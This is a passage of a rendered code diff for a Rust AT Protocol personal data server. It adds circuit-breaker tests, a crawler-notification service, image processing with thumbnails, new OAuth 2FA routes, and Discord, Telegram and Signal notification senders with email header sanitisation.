237
+
cb.record_failure().await;
238
+
assert_eq!(cb.state().await, CircuitState::Open);
239
+
assert!(!cb.can_execute().await);
240
+
}
241
+
242
+
#[tokio::test]
243
+
async fn test_circuit_breaker_success_resets_failures() {
244
+
let cb = CircuitBreaker::new("test", 3, 2, 10);
245
+
246
+
cb.record_failure().await;
247
+
cb.record_failure().await;
248
+
cb.record_success().await;
249
+
250
+
cb.record_failure().await;
251
+
cb.record_failure().await;
252
+
assert_eq!(cb.state().await, CircuitState::Closed);
253
+
254
+
cb.record_failure().await;
255
+
assert_eq!(cb.state().await, CircuitState::Open);
256
+
}
257
+
258
+
#[tokio::test]
259
+
async fn test_circuit_breaker_half_open_closes_after_successes() {
260
+
let cb = CircuitBreaker::new("test", 3, 2, 0);
261
+
262
+
for _ in 0..3 {
263
+
cb.record_failure().await;
264
+
}
265
+
assert_eq!(cb.state().await, CircuitState::Open);
266
+
267
+
tokio::time::sleep(Duration::from_millis(100)).await;
268
+
269
+
assert!(cb.can_execute().await);
270
+
assert_eq!(cb.state().await, CircuitState::HalfOpen);
271
+
272
+
cb.record_success().await;
273
+
assert_eq!(cb.state().await, CircuitState::HalfOpen);
274
+
275
+
cb.record_success().await;
276
+
assert_eq!(cb.state().await, CircuitState::Closed);
277
+
}
278
+
279
+
#[tokio::test]
280
+
async fn test_circuit_breaker_half_open_reopens_on_failure() {
281
+
let cb = CircuitBreaker::new("test", 3, 2, 0);
282
+
283
+
for _ in 0..3 {
284
+
cb.record_failure().await;
285
+
}
286
+
287
+
tokio::time::sleep(Duration::from_millis(100)).await;
288
+
cb.can_execute().await;
289
+
290
+
cb.record_failure().await;
291
+
assert_eq!(cb.state().await, CircuitState::Open);
292
+
}
293
+
294
+
#[tokio::test]
295
+
async fn test_with_circuit_breaker_helper() {
296
+
let cb = CircuitBreaker::new("test", 3, 2, 10);
297
+
298
+
let result: Result<i32, CircuitBreakerError<std::io::Error>> =
299
+
with_circuit_breaker(&cb, || async { Ok(42) }).await;
300
+
assert!(result.is_ok());
301
+
assert_eq!(result.unwrap(), 42);
302
+
303
+
let result: Result<i32, CircuitBreakerError<&str>> =
304
+
with_circuit_breaker(&cb, || async { Err("error") }).await;
305
+
assert!(result.is_err());
306
+
}
307
+
}
+170
src/crawlers.rs
+170
src/crawlers.rs
···
···
1
+
use crate::circuit_breaker::CircuitBreaker;
2
+
use crate::sync::firehose::SequencedEvent;
3
+
use reqwest::Client;
4
+
use std::sync::atomic::{AtomicU64, Ordering};
5
+
use std::sync::Arc;
6
+
use std::time::Duration;
7
+
use tokio::sync::{broadcast, watch};
8
+
use tracing::{debug, error, info, warn};
9
+
10
+
const NOTIFY_THRESHOLD_SECS: u64 = 20 * 60;
11
+
12
+
pub struct Crawlers {
13
+
hostname: String,
14
+
crawler_urls: Vec<String>,
15
+
http_client: Client,
16
+
last_notified: AtomicU64,
17
+
circuit_breaker: Option<Arc<CircuitBreaker>>,
18
+
}
19
+
20
+
impl Crawlers {
21
+
pub fn new(hostname: String, crawler_urls: Vec<String>) -> Self {
22
+
Self {
23
+
hostname,
24
+
crawler_urls,
25
+
http_client: Client::builder()
26
+
.timeout(Duration::from_secs(30))
27
+
.build()
28
+
.unwrap_or_default(),
29
+
last_notified: AtomicU64::new(0),
30
+
circuit_breaker: None,
31
+
}
32
+
}
33
+
34
+
pub fn with_circuit_breaker(mut self, circuit_breaker: Arc<CircuitBreaker>) -> Self {
35
+
self.circuit_breaker = Some(circuit_breaker);
36
+
self
37
+
}
38
+
39
+
pub fn from_env() -> Option<Self> {
40
+
let hostname = std::env::var("PDS_HOSTNAME").ok()?;
41
+
let crawler_urls: Vec<String> = std::env::var("CRAWLERS")
42
+
.unwrap_or_default()
43
+
.split(',')
44
+
.filter(|s| !s.is_empty())
45
+
.map(|s| s.trim().to_string())
46
+
.collect();
47
+
48
+
if crawler_urls.is_empty() {
49
+
return None;
50
+
}
51
+
52
+
Some(Self::new(hostname, crawler_urls))
53
+
}
54
+
55
+
fn should_notify(&self) -> bool {
56
+
let now = std::time::SystemTime::now()
57
+
.duration_since(std::time::UNIX_EPOCH)
58
+
.unwrap_or_default()
59
+
.as_secs();
60
+
let last = self.last_notified.load(Ordering::Relaxed);
61
+
now - last >= NOTIFY_THRESHOLD_SECS
62
+
}
63
+
64
+
fn mark_notified(&self) {
65
+
let now = std::time::SystemTime::now()
66
+
.duration_since(std::time::UNIX_EPOCH)
67
+
.unwrap_or_default()
68
+
.as_secs();
69
+
self.last_notified.store(now, Ordering::Relaxed);
70
+
}
71
+
72
+
pub async fn notify_of_update(&self) {
73
+
if !self.should_notify() {
74
+
debug!("Skipping crawler notification due to debounce");
75
+
return;
76
+
}
77
+
78
+
if let Some(cb) = &self.circuit_breaker {
79
+
if !cb.can_execute().await {
80
+
debug!("Skipping crawler notification due to circuit breaker open");
81
+
return;
82
+
}
83
+
}
84
+
85
+
self.mark_notified();
86
+
87
+
let circuit_breaker = self.circuit_breaker.clone();
88
+
89
+
for crawler_url in &self.crawler_urls {
90
+
let url = format!("{}/xrpc/com.atproto.sync.requestCrawl", crawler_url.trim_end_matches('/'));
91
+
let hostname = self.hostname.clone();
92
+
let client = self.http_client.clone();
93
+
let cb = circuit_breaker.clone();
94
+
95
+
tokio::spawn(async move {
96
+
match client
97
+
.post(&url)
98
+
.json(&serde_json::json!({ "hostname": hostname }))
99
+
.send()
100
+
.await
101
+
{
102
+
Ok(response) => {
103
+
if response.status().is_success() {
104
+
debug!(crawler = %url, "Successfully notified crawler");
105
+
if let Some(cb) = cb {
106
+
cb.record_success().await;
107
+
}
108
+
} else {
109
+
warn!(
110
+
crawler = %url,
111
+
status = %response.status(),
112
+
"Crawler notification returned non-success status"
113
+
);
114
+
if let Some(cb) = cb {
115
+
cb.record_failure().await;
116
+
}
117
+
}
118
+
}
119
+
Err(e) => {
120
+
warn!(crawler = %url, error = %e, "Failed to notify crawler");
121
+
if let Some(cb) = cb {
122
+
cb.record_failure().await;
123
+
}
124
+
}
125
+
}
126
+
});
127
+
}
128
+
}
129
+
}
130
+
131
+
pub async fn start_crawlers_service(
132
+
crawlers: Arc<Crawlers>,
133
+
mut firehose_rx: broadcast::Receiver<SequencedEvent>,
134
+
mut shutdown: watch::Receiver<bool>,
135
+
) {
136
+
info!(
137
+
hostname = %crawlers.hostname,
138
+
crawler_count = crawlers.crawler_urls.len(),
139
+
crawlers = ?crawlers.crawler_urls,
140
+
"Starting crawlers notification service"
141
+
);
142
+
143
+
loop {
144
+
tokio::select! {
145
+
result = firehose_rx.recv() => {
146
+
match result {
147
+
Ok(event) => {
148
+
if event.event_type == "commit" {
149
+
crawlers.notify_of_update().await;
150
+
}
151
+
}
152
+
Err(broadcast::error::RecvError::Lagged(n)) => {
153
+
warn!(skipped = n, "Crawlers service lagged behind firehose");
154
+
crawlers.notify_of_update().await;
155
+
}
156
+
Err(broadcast::error::RecvError::Closed) => {
157
+
error!("Firehose channel closed, stopping crawlers service");
158
+
break;
159
+
}
160
+
}
161
+
}
162
+
_ = shutdown.changed() => {
163
+
if *shutdown.borrow() {
164
+
info!("Crawlers service shutting down");
165
+
break;
166
+
}
167
+
}
168
+
}
169
+
}
170
+
}
+304
src/image/mod.rs
+304
src/image/mod.rs
···
···
1
+
use image::{DynamicImage, ImageFormat, ImageReader, imageops::FilterType};
2
+
use std::io::Cursor;
3
+
4
+
pub const THUMB_SIZE_FEED: u32 = 200;
5
+
pub const THUMB_SIZE_FULL: u32 = 1000;
6
+
7
+
#[derive(Debug, Clone)]
8
+
pub struct ProcessedImage {
9
+
pub data: Vec<u8>,
10
+
pub mime_type: String,
11
+
pub width: u32,
12
+
pub height: u32,
13
+
}
14
+
15
+
#[derive(Debug, Clone)]
16
+
pub struct ImageProcessingResult {
17
+
pub original: ProcessedImage,
18
+
pub thumbnail_feed: Option<ProcessedImage>,
19
+
pub thumbnail_full: Option<ProcessedImage>,
20
+
}
21
+
22
+
#[derive(Debug, thiserror::Error)]
23
+
pub enum ImageError {
24
+
#[error("Failed to decode image: {0}")]
25
+
DecodeError(String),
26
+
27
+
#[error("Failed to encode image: {0}")]
28
+
EncodeError(String),
29
+
30
+
#[error("Unsupported image format: {0}")]
31
+
UnsupportedFormat(String),
32
+
33
+
#[error("Image too large: {width}x{height} exceeds maximum {max_dimension}")]
34
+
TooLarge {
35
+
width: u32,
36
+
height: u32,
37
+
max_dimension: u32,
38
+
},
39
+
40
+
#[error("File too large: {size} bytes exceeds maximum {max_size} bytes")]
41
+
FileTooLarge { size: usize, max_size: usize },
42
+
}
43
+
44
+
pub const DEFAULT_MAX_FILE_SIZE: usize = 10 * 1024 * 1024; // 10MB
45
+
46
+
pub struct ImageProcessor {
47
+
max_dimension: u32,
48
+
max_file_size: usize,
49
+
output_format: OutputFormat,
50
+
generate_thumbnails: bool,
51
+
}
52
+
53
+
#[derive(Debug, Clone, Copy)]
54
+
pub enum OutputFormat {
55
+
WebP,
56
+
Jpeg,
57
+
Png,
58
+
Original,
59
+
}
60
+
61
+
impl Default for ImageProcessor {
62
+
fn default() -> Self {
63
+
Self {
64
+
max_dimension: 4096,
65
+
max_file_size: DEFAULT_MAX_FILE_SIZE,
66
+
output_format: OutputFormat::WebP,
67
+
generate_thumbnails: true,
68
+
}
69
+
}
70
+
}
71
+
72
+
impl ImageProcessor {
73
+
pub fn new() -> Self {
74
+
Self::default()
75
+
}
76
+
77
+
pub fn with_max_dimension(mut self, max: u32) -> Self {
78
+
self.max_dimension = max;
79
+
self
80
+
}
81
+
82
+
pub fn with_max_file_size(mut self, max: usize) -> Self {
83
+
self.max_file_size = max;
84
+
self
85
+
}
86
+
87
+
pub fn with_output_format(mut self, format: OutputFormat) -> Self {
88
+
self.output_format = format;
89
+
self
90
+
}
91
+
92
+
pub fn with_thumbnails(mut self, generate: bool) -> Self {
93
+
self.generate_thumbnails = generate;
94
+
self
95
+
}
96
+
97
+
pub fn process(&self, data: &[u8], mime_type: &str) -> Result<ImageProcessingResult, ImageError> {
98
+
if data.len() > self.max_file_size {
99
+
return Err(ImageError::FileTooLarge {
100
+
size: data.len(),
101
+
max_size: self.max_file_size,
102
+
});
103
+
}
104
+
105
+
let format = self.detect_format(mime_type, data)?;
106
+
let img = self.decode_image(data, format)?;
107
+
108
+
if img.width() > self.max_dimension || img.height() > self.max_dimension {
109
+
return Err(ImageError::TooLarge {
110
+
width: img.width(),
111
+
height: img.height(),
112
+
max_dimension: self.max_dimension,
113
+
});
114
+
}
115
+
116
+
let original = self.encode_image(&img)?;
117
+
118
+
let thumbnail_feed = if self.generate_thumbnails && (img.width() > THUMB_SIZE_FEED || img.height() > THUMB_SIZE_FEED) {
119
+
Some(self.generate_thumbnail(&img, THUMB_SIZE_FEED)?)
120
+
} else {
121
+
None
122
+
};
123
+
124
+
let thumbnail_full = if self.generate_thumbnails && (img.width() > THUMB_SIZE_FULL || img.height() > THUMB_SIZE_FULL) {
125
+
Some(self.generate_thumbnail(&img, THUMB_SIZE_FULL)?)
126
+
} else {
127
+
None
128
+
};
129
+
130
+
Ok(ImageProcessingResult {
131
+
original,
132
+
thumbnail_feed,
133
+
thumbnail_full,
134
+
})
135
+
}
136
+
137
+
fn detect_format(&self, mime_type: &str, data: &[u8]) -> Result<ImageFormat, ImageError> {
138
+
match mime_type.to_lowercase().as_str() {
139
+
"image/jpeg" | "image/jpg" => Ok(ImageFormat::Jpeg),
140
+
"image/png" => Ok(ImageFormat::Png),
141
+
"image/gif" => Ok(ImageFormat::Gif),
142
+
"image/webp" => Ok(ImageFormat::WebP),
143
+
_ => {
144
+
if let Ok(format) = image::guess_format(data) {
145
+
Ok(format)
146
+
} else {
147
+
Err(ImageError::UnsupportedFormat(mime_type.to_string()))
148
+
}
149
+
}
150
+
}
151
+
}
152
+
153
+
fn decode_image(&self, data: &[u8], format: ImageFormat) -> Result<DynamicImage, ImageError> {
154
+
let cursor = Cursor::new(data);
155
+
let reader = ImageReader::with_format(cursor, format);
156
+
reader
157
+
.decode()
158
+
.map_err(|e| ImageError::DecodeError(e.to_string()))
159
+
}
160
+
161
+
fn encode_image(&self, img: &DynamicImage) -> Result<ProcessedImage, ImageError> {
162
+
let (data, mime_type) = match self.output_format {
163
+
OutputFormat::WebP => {
164
+
let mut buf = Vec::new();
165
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP)
166
+
.map_err(|e| ImageError::EncodeError(e.to_string()))?;
167
+
(buf, "image/webp".to_string())
168
+
}
169
+
OutputFormat::Jpeg => {
170
+
let mut buf = Vec::new();
171
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg)
172
+
.map_err(|e| ImageError::EncodeError(e.to_string()))?;
173
+
(buf, "image/jpeg".to_string())
174
+
}
175
+
OutputFormat::Png => {
176
+
let mut buf = Vec::new();
177
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png)
178
+
.map_err(|e| ImageError::EncodeError(e.to_string()))?;
179
+
(buf, "image/png".to_string())
180
+
}
181
+
OutputFormat::Original => {
182
+
let mut buf = Vec::new();
183
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png)
184
+
.map_err(|e| ImageError::EncodeError(e.to_string()))?;
185
+
(buf, "image/png".to_string())
186
+
}
187
+
};
188
+
189
+
Ok(ProcessedImage {
190
+
data,
191
+
mime_type,
192
+
width: img.width(),
193
+
height: img.height(),
194
+
})
195
+
}
196
+
197
+
fn generate_thumbnail(&self, img: &DynamicImage, max_size: u32) -> Result<ProcessedImage, ImageError> {
198
+
let (orig_width, orig_height) = (img.width(), img.height());
199
+
200
+
let (new_width, new_height) = if orig_width > orig_height {
201
+
let ratio = max_size as f64 / orig_width as f64;
202
+
(max_size, (orig_height as f64 * ratio) as u32)
203
+
} else {
204
+
let ratio = max_size as f64 / orig_height as f64;
205
+
((orig_width as f64 * ratio) as u32, max_size)
206
+
};
207
+
208
+
let thumb = img.resize(new_width, new_height, FilterType::Lanczos3);
209
+
self.encode_image(&thumb)
210
+
}
211
+
212
+
pub fn is_supported_mime_type(mime_type: &str) -> bool {
213
+
matches!(
214
+
mime_type.to_lowercase().as_str(),
215
+
"image/jpeg" | "image/jpg" | "image/png" | "image/gif" | "image/webp"
216
+
)
217
+
}
218
+
219
+
pub fn strip_exif(data: &[u8]) -> Result<Vec<u8>, ImageError> {
220
+
let format = image::guess_format(data)
221
+
.map_err(|e| ImageError::DecodeError(e.to_string()))?;
222
+
223
+
let cursor = Cursor::new(data);
224
+
let img = ImageReader::with_format(cursor, format)
225
+
.decode()
226
+
.map_err(|e| ImageError::DecodeError(e.to_string()))?;
227
+
228
+
let mut buf = Vec::new();
229
+
img.write_to(&mut Cursor::new(&mut buf), format)
230
+
.map_err(|e| ImageError::EncodeError(e.to_string()))?;
231
+
232
+
Ok(buf)
233
+
}
234
+
}
235
+
236
+
#[cfg(test)]
237
+
mod tests {
238
+
use super::*;
239
+
240
+
fn create_test_image(width: u32, height: u32) -> Vec<u8> {
241
+
let img = DynamicImage::new_rgb8(width, height);
242
+
let mut buf = Vec::new();
243
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap();
244
+
buf
245
+
}
246
+
247
+
#[test]
248
+
fn test_process_small_image() {
249
+
let processor = ImageProcessor::new();
250
+
let data = create_test_image(100, 100);
251
+
252
+
let result = processor.process(&data, "image/png").unwrap();
253
+
254
+
assert!(result.thumbnail_feed.is_none());
255
+
assert!(result.thumbnail_full.is_none());
256
+
}
257
+
258
+
#[test]
259
+
fn test_process_large_image_generates_thumbnails() {
260
+
let processor = ImageProcessor::new();
261
+
let data = create_test_image(2000, 1500);
262
+
263
+
let result = processor.process(&data, "image/png").unwrap();
264
+
265
+
assert!(result.thumbnail_feed.is_some());
266
+
assert!(result.thumbnail_full.is_some());
267
+
268
+
let feed_thumb = result.thumbnail_feed.unwrap();
269
+
assert!(feed_thumb.width <= THUMB_SIZE_FEED);
270
+
assert!(feed_thumb.height <= THUMB_SIZE_FEED);
271
+
272
+
let full_thumb = result.thumbnail_full.unwrap();
273
+
assert!(full_thumb.width <= THUMB_SIZE_FULL);
274
+
assert!(full_thumb.height <= THUMB_SIZE_FULL);
275
+
}
276
+
277
+
#[test]
278
+
fn test_webp_conversion() {
279
+
let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP);
280
+
let data = create_test_image(500, 500);
281
+
282
+
let result = processor.process(&data, "image/png").unwrap();
283
+
assert_eq!(result.original.mime_type, "image/webp");
284
+
}
285
+
286
+
#[test]
287
+
fn test_reject_too_large() {
288
+
let processor = ImageProcessor::new().with_max_dimension(1000);
289
+
let data = create_test_image(2000, 2000);
290
+
291
+
let result = processor.process(&data, "image/png");
292
+
assert!(matches!(result, Err(ImageError::TooLarge { .. })));
293
+
}
294
+
295
+
#[test]
296
+
fn test_is_supported_mime_type() {
297
+
assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
298
+
assert!(ImageProcessor::is_supported_mime_type("image/png"));
299
+
assert!(ImageProcessor::is_supported_mime_type("image/gif"));
300
+
assert!(ImageProcessor::is_supported_mime_type("image/webp"));
301
+
assert!(!ImageProcessor::is_supported_mime_type("image/bmp"));
302
+
assert!(!ImageProcessor::is_supported_mime_type("text/plain"));
303
+
}
304
+
}
+22
src/lib.rs
+22
src/lib.rs
···
1
pub mod api;
2
pub mod auth;
3
pub mod config;
4
pub mod notifications;
5
pub mod oauth;
6
pub mod plc;
7
pub mod repo;
8
pub mod state;
9
pub mod storage;
10
pub mod sync;
11
pub mod util;
12
13
use axum::{
14
Router,
···
20
Router::new()
21
.route("/health", get(api::server::health))
22
.route("/xrpc/_health", get(api::server::health))
23
.route(
24
"/xrpc/com.atproto.server.describeServer",
25
get(api::server::describe_server),
···
139
.route(
140
"/xrpc/com.atproto.sync.subscribeRepos",
141
get(sync::subscribe_repos),
142
)
143
.route(
144
"/xrpc/com.atproto.moderation.createReport",
···
338
)
339
.route("/oauth/authorize", get(oauth::endpoints::authorize_get))
340
.route("/oauth/authorize", post(oauth::endpoints::authorize_post))
341
.route("/oauth/token", post(oauth::endpoints::token_endpoint))
342
.route("/oauth/revoke", post(oauth::endpoints::revoke_token))
343
.route("/oauth/introspect", post(oauth::endpoints::introspect_token))
344
.route("/xrpc/{*method}", any(api::proxy::proxy_handler))
345
.with_state(state)
346
}
···
1
pub mod api;
2
pub mod auth;
3
+
pub mod circuit_breaker;
4
pub mod config;
5
+
pub mod crawlers;
6
+
pub mod image;
7
pub mod notifications;
8
pub mod oauth;
9
pub mod plc;
10
+
pub mod rate_limit;
11
pub mod repo;
12
pub mod state;
13
pub mod storage;
14
pub mod sync;
15
pub mod util;
16
+
pub mod validation;
17
18
use axum::{
19
Router,
···
25
Router::new()
26
.route("/health", get(api::server::health))
27
.route("/xrpc/_health", get(api::server::health))
28
+
.route("/robots.txt", get(api::server::robots_txt))
29
.route(
30
"/xrpc/com.atproto.server.describeServer",
31
get(api::server::describe_server),
···
145
.route(
146
"/xrpc/com.atproto.sync.subscribeRepos",
147
get(sync::subscribe_repos),
148
+
)
149
+
.route(
150
+
"/xrpc/com.atproto.sync.getHead",
151
+
get(sync::get_head),
152
+
)
153
+
.route(
154
+
"/xrpc/com.atproto.sync.getCheckout",
155
+
get(sync::get_checkout),
156
)
157
.route(
158
"/xrpc/com.atproto.moderation.createReport",
···
352
)
353
.route("/oauth/authorize", get(oauth::endpoints::authorize_get))
354
.route("/oauth/authorize", post(oauth::endpoints::authorize_post))
355
+
.route("/oauth/authorize/select", post(oauth::endpoints::authorize_select))
356
+
.route("/oauth/authorize/2fa", get(oauth::endpoints::authorize_2fa_get))
357
+
.route("/oauth/authorize/2fa", post(oauth::endpoints::authorize_2fa_post))
358
+
.route("/oauth/authorize/deny", post(oauth::endpoints::authorize_deny))
359
.route("/oauth/token", post(oauth::endpoints::token_endpoint))
360
.route("/oauth/revoke", post(oauth::endpoints::revoke_token))
361
.route("/oauth/introspect", post(oauth::endpoints::introspect_token))
362
+
.route(
363
+
"/xrpc/com.atproto.temp.checkSignupQueue",
364
+
get(api::temp::check_signup_queue),
365
+
)
366
.route("/xrpc/{*method}", any(api::proxy::proxy_handler))
367
.with_state(state)
368
}
+34
-9
src/main.rs
+34
-9
src/main.rs
···
1
-
use bspds::notifications::{EmailSender, NotificationService};
2
use bspds::state::AppState;
3
use std::net::SocketAddr;
4
use std::process::ExitCode;
5
use tokio::sync::watch;
6
use tracing::{error, info, warn};
7
···
41
let state = AppState::new(pool.clone()).await;
42
43
bspds::sync::listener::start_sequencer_listener(state.clone()).await;
44
-
let relays = std::env::var("RELAYS")
45
-
.unwrap_or_default()
46
-
.split(',')
47
-
.filter(|s| !s.is_empty())
48
-
.map(|s| s.to_string())
49
-
.collect();
50
-
bspds::sync::relay_client::start_relay_clients(state.clone(), relays, None).await;
51
52
let (shutdown_tx, shutdown_rx) = watch::channel(false);
53
···
60
warn!("Email notifications disabled (MAIL_FROM_ADDRESS not set)");
61
}
62
63
-
let notification_handle = tokio::spawn(notification_service.run(shutdown_rx));
64
65
let app = bspds::app(state);
66
···
75
.await;
76
77
notification_handle.await.ok();
78
79
if let Err(e) = server_result {
80
return Err(format!("Server error: {}", e).into());
···
1
+
use bspds::crawlers::{Crawlers, start_crawlers_service};
2
+
use bspds::notifications::{DiscordSender, EmailSender, NotificationService, SignalSender, TelegramSender};
3
use bspds::state::AppState;
4
use std::net::SocketAddr;
5
use std::process::ExitCode;
6
+
use std::sync::Arc;
7
use tokio::sync::watch;
8
use tracing::{error, info, warn};
9
···
43
let state = AppState::new(pool.clone()).await;
44
45
bspds::sync::listener::start_sequencer_listener(state.clone()).await;
46
47
let (shutdown_tx, shutdown_rx) = watch::channel(false);
48
···
55
warn!("Email notifications disabled (MAIL_FROM_ADDRESS not set)");
56
}
57
58
+
if let Some(discord_sender) = DiscordSender::from_env() {
59
+
info!("Discord notifications enabled");
60
+
notification_service = notification_service.register_sender(discord_sender);
61
+
}
62
+
63
+
if let Some(telegram_sender) = TelegramSender::from_env() {
64
+
info!("Telegram notifications enabled");
65
+
notification_service = notification_service.register_sender(telegram_sender);
66
+
}
67
+
68
+
if let Some(signal_sender) = SignalSender::from_env() {
69
+
info!("Signal notifications enabled");
70
+
notification_service = notification_service.register_sender(signal_sender);
71
+
}
72
+
73
+
let notification_handle = tokio::spawn(notification_service.run(shutdown_rx.clone()));
74
+
75
+
let crawlers_handle = if let Some(crawlers) = Crawlers::from_env() {
76
+
let crawlers = Arc::new(
77
+
crawlers.with_circuit_breaker(state.circuit_breakers.relay_notification.clone())
78
+
);
79
+
let firehose_rx = state.firehose_tx.subscribe();
80
+
info!("Crawlers notification service enabled");
81
+
Some(tokio::spawn(start_crawlers_service(crawlers, firehose_rx, shutdown_rx)))
82
+
} else {
83
+
warn!("Crawlers notification service disabled (PDS_HOSTNAME or CRAWLERS not set)");
84
+
None
85
+
};
86
87
let app = bspds::app(state);
88
···
97
.await;
98
99
notification_handle.await.ok();
100
+
if let Some(handle) = crawlers_handle {
101
+
handle.await.ok();
102
+
}
103
104
if let Err(e) = server_result {
105
return Err(format!("Server error: {}", e).into());
+7
-4
src/notifications/mod.rs
+7
-4
src/notifications/mod.rs
···
2
mod service;
3
mod types;
4
5
-
pub use sender::{EmailSender, NotificationSender};
6
pub use service::{
7
-
enqueue_account_deletion, enqueue_email_update, enqueue_email_verification,
8
-
enqueue_notification, enqueue_password_reset, enqueue_plc_operation, enqueue_welcome,
9
-
NotificationService,
10
};
11
pub use types::{
12
NewNotification, NotificationChannel, NotificationStatus, NotificationType, QueuedNotification,
···
2
mod service;
3
mod types;
4
5
+
pub use sender::{
6
+
DiscordSender, EmailSender, NotificationSender, SendError, SignalSender, TelegramSender,
7
+
is_valid_phone_number, sanitize_header_value,
8
+
};
9
pub use service::{
10
+
channel_display_name, enqueue_2fa_code, enqueue_account_deletion, enqueue_email_update,
11
+
enqueue_email_verification, enqueue_notification, enqueue_password_reset,
12
+
enqueue_plc_operation, enqueue_welcome, NotificationService,
13
};
14
pub use types::{
15
NewNotification, NotificationChannel, NotificationStatus, NotificationType, QueuedNotification,
+293
-4
src/notifications/sender.rs
+293
-4
src/notifications/sender.rs
···
1
use async_trait::async_trait;
2
use std::process::Stdio;
3
use tokio::io::AsyncWriteExt;
4
use tokio::process::Command;
5
6
use super::types::{NotificationChannel, QueuedNotification};
7
8
#[async_trait]
9
pub trait NotificationSender: Send + Sync {
···
24
25
#[error("External service error: {0}")]
26
ExternalService(String),
27
}
28
29
pub struct EmailSender {
···
47
Some(Self::new(from_address, from_name))
48
}
49
50
-
fn format_email(&self, notification: &QueuedNotification) -> String {
51
-
let subject = notification.subject.as_deref().unwrap_or("Notification");
52
let from_header = if self.from_name.is_empty() {
53
self.from_address.clone()
54
} else {
55
-
format!("{} <{}>", self.from_name, self.from_address)
56
};
57
58
format!(
59
"From: {}\r\nTo: {}\r\nSubject: {}\r\nContent-Type: text/plain; charset=utf-8\r\nMIME-Version: 1.0\r\n\r\n{}",
60
from_header,
61
-
notification.recipient,
62
subject,
63
notification.body
64
)
···
96
Ok(())
97
}
98
}
···
1
use async_trait::async_trait;
2
+
use reqwest::Client;
3
+
use serde_json::json;
4
use std::process::Stdio;
5
+
use std::time::Duration;
6
use tokio::io::AsyncWriteExt;
7
use tokio::process::Command;
8
9
use super::types::{NotificationChannel, QueuedNotification};
10
+
11
+
const HTTP_TIMEOUT_SECS: u64 = 30;
12
+
const MAX_RETRIES: u32 = 3;
13
+
const INITIAL_RETRY_DELAY_MS: u64 = 500;
14
15
#[async_trait]
16
pub trait NotificationSender: Send + Sync {
···
31
32
#[error("External service error: {0}")]
33
ExternalService(String),
34
+
35
+
#[error("Invalid recipient format: {0}")]
36
+
InvalidRecipient(String),
37
+
38
+
#[error("Request timeout")]
39
+
Timeout,
40
+
41
+
#[error("Max retries exceeded: {0}")]
42
+
MaxRetriesExceeded(String),
43
+
}
44
+
45
+
fn create_http_client() -> Client {
46
+
Client::builder()
47
+
.timeout(Duration::from_secs(HTTP_TIMEOUT_SECS))
48
+
.connect_timeout(Duration::from_secs(10))
49
+
.build()
50
+
.unwrap_or_else(|_| Client::new())
51
+
}
52
+
53
+
fn is_retryable_status(status: reqwest::StatusCode) -> bool {
54
+
status.is_server_error() || status == reqwest::StatusCode::TOO_MANY_REQUESTS
55
+
}
56
+
57
+
async fn retry_delay(attempt: u32) {
58
+
let delay_ms = INITIAL_RETRY_DELAY_MS * 2u64.pow(attempt);
59
+
tokio::time::sleep(Duration::from_millis(delay_ms)).await;
60
+
}
61
+
62
+
pub fn sanitize_header_value(value: &str) -> String {
63
+
value.replace(['\r', '\n'], " ").trim().to_string()
64
+
}
65
+
66
+
pub fn is_valid_phone_number(number: &str) -> bool {
67
+
if number.len() < 2 || number.len() > 20 {
68
+
return false;
69
+
}
70
+
let mut chars = number.chars();
71
+
if chars.next() != Some('+') {
72
+
return false;
73
+
}
74
+
let remaining: String = chars.collect();
75
+
!remaining.is_empty() && remaining.chars().all(|c| c.is_ascii_digit())
76
}
77
78
pub struct EmailSender {
···
96
Some(Self::new(from_address, from_name))
97
}
98
99
+
pub fn format_email(&self, notification: &QueuedNotification) -> String {
100
+
let subject = sanitize_header_value(notification.subject.as_deref().unwrap_or("Notification"));
101
+
let recipient = sanitize_header_value(¬ification.recipient);
102
let from_header = if self.from_name.is_empty() {
103
self.from_address.clone()
104
} else {
105
+
format!("{} <{}>", sanitize_header_value(&self.from_name), self.from_address)
106
};
107
108
format!(
109
"From: {}\r\nTo: {}\r\nSubject: {}\r\nContent-Type: text/plain; charset=utf-8\r\nMIME-Version: 1.0\r\n\r\n{}",
110
from_header,
111
+
recipient,
112
subject,
113
notification.body
114
)
···
146
Ok(())
147
}
148
}
149
+
150
+
pub struct DiscordSender {
151
+
webhook_url: String,
152
+
http_client: Client,
153
+
}
154
+
155
+
impl DiscordSender {
156
+
pub fn new(webhook_url: String) -> Self {
157
+
Self {
158
+
webhook_url,
159
+
http_client: create_http_client(),
160
+
}
161
+
}
162
+
163
+
pub fn from_env() -> Option<Self> {
164
+
let webhook_url = std::env::var("DISCORD_WEBHOOK_URL").ok()?;
165
+
Some(Self::new(webhook_url))
166
+
}
167
+
}
168
+
169
+
#[async_trait]
170
+
impl NotificationSender for DiscordSender {
171
+
fn channel(&self) -> NotificationChannel {
172
+
NotificationChannel::Discord
173
+
}
174
+
175
+
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
176
+
let subject = notification.subject.as_deref().unwrap_or("Notification");
177
+
let content = format!("**{}**\n\n{}", subject, notification.body);
178
+
179
+
let payload = json!({
180
+
"content": content,
181
+
"username": "BSPDS"
182
+
});
183
+
184
+
let mut last_error = None;
185
+
for attempt in 0..MAX_RETRIES {
186
+
let result = self
187
+
.http_client
188
+
.post(&self.webhook_url)
189
+
.json(&payload)
190
+
.send()
191
+
.await;
192
+
193
+
match result {
194
+
Ok(response) => {
195
+
if response.status().is_success() {
196
+
return Ok(());
197
+
}
198
+
199
+
let status = response.status();
200
+
if is_retryable_status(status) && attempt < MAX_RETRIES - 1 {
201
+
last_error = Some(format!("Discord webhook returned {}", status));
202
+
retry_delay(attempt).await;
203
+
continue;
204
+
}
205
+
206
+
let body = response.text().await.unwrap_or_default();
207
+
return Err(SendError::ExternalService(format!(
208
+
"Discord webhook returned {}: {}",
209
+
status, body
210
+
)));
211
+
}
212
+
Err(e) => {
213
+
if e.is_timeout() {
214
+
if attempt < MAX_RETRIES - 1 {
215
+
last_error = Some(format!("Discord request timed out"));
216
+
retry_delay(attempt).await;
217
+
continue;
218
+
}
219
+
return Err(SendError::Timeout);
220
+
}
221
+
return Err(SendError::ExternalService(format!(
222
+
"Discord request failed: {}",
223
